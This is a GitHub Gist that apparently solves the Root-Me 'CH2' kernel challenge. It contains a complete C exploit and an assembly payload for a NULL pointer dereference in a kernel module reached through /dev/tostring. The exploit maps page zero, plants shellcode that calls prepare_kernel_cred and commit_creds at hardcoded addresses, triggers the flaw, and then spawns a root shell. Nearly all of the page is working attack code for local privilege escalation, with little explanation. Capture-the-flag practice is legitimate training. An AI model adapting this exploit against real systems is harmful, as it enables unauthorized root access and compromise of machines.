Last active
January 2, 2018 15:29
-
-
Save HopHouse/506a4ae05b189e307e7f9e9a77e33cf6 to your computer and use it in GitHub Desktop.
CH2 root-me
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Rouvès Quentin - rouves.quentin@hotmail.fr | |
| * Exploit NULL Dereference kernel module | |
| * Exec: gcc exploit.c -static -m32 -o exploit | |
| */ | |
| #include <sys/types.h> | |
| #include <stdio.h> | |
| #include <sys/stat.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| #include <string.h> | |
| char payload[] = "\x31\xc0\xe8\xe9\x11\x07\xc1\xe8\x74\x0e\x07\xc1\xc3"; | |
| void get_shell() { | |
| char *argv[] = {"/bin/sh", NULL}; | |
| if (getuid() == 0){ | |
| printf("[+] Root shell success !\n"); | |
| //execve("/bin/sh", argv, NULL); | |
| system("/bin/sh"); | |
| } | |
| else { | |
| printf("[-] failed to get root shell\n"); | |
| } | |
| } | |
| int main () { | |
| printf("[+] Script: Try to allocat 0x00000000...\n"); | |
| if (mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){ | |
| printf("[-] Script: Failed to allocat at 0x00000000\n"); | |
| return -1; | |
| } | |
| printf("[+] Script: Allocation success !\n"); | |
| printf("[+] Script: Try to put payload at 0x00000000...\n"); | |
| if (memcpy (NULL , payload , sizeof ( payload )) == (char *)-1){ | |
| printf("[-] Script: Failed to put payload at 0x00000000\n"); | |
| return -1; | |
| } | |
| printf("[+] Script: Put payload success !\n"); | |
| printf("[+] Script: Open the file for reading and writing\n"); | |
| int fd = open ( "/dev/tostring" , O_RDWR ); | |
| printf("[+] Script: Write command to delete the stack\n"); | |
| write ( fd , "**********S\n" , 12); | |
| char tmp[1]; | |
| printf("[+] Script: Read the file\n"); | |
| read(fd, tmp, 1); | |
| printf("[+] Script: Close the file\n"); | |
| close(fd); | |
| get_shell(); | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Rouvès Quentin - rouves.quentin@hotmail.fr | |
| * Exploit NULL Dereference kernel module | |
| * Exec: gcc payload.S -o payload -nostdlib -m32 -Ttext=0 | |
| */ | |
| // prepare kernel cred c10711f0 | |
| // commit cred: c1070e80 | |
| .globl _start | |
| _start: | |
| xor %eax , %eax # Put eax to 0 | |
| call 0xc10711f0 # Call prepare kernel cred with arg 0 | |
| call 0xc1070e80 # Call commit creds | |
| ret | |
| /* | |
| payload: file format elf32-i386 | |
| Disassembly of section .text: | |
| 00000000 <_start>: | |
| 0: 31 c0 xor %eax,%eax | |
| 2: e8 e9 11 07 c1 call c10711f0 <_end+0xc10701e0> | |
| 7: e8 74 0e 07 c1 call c1070e80 <_end+0xc106fe70> | |
| c: c3 ret | |
| payload = \x31\xc0\xe8\xe9\x11\x07\xc1\xe8\x74\x0e\x07\xc1\xc3 | |
| */ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment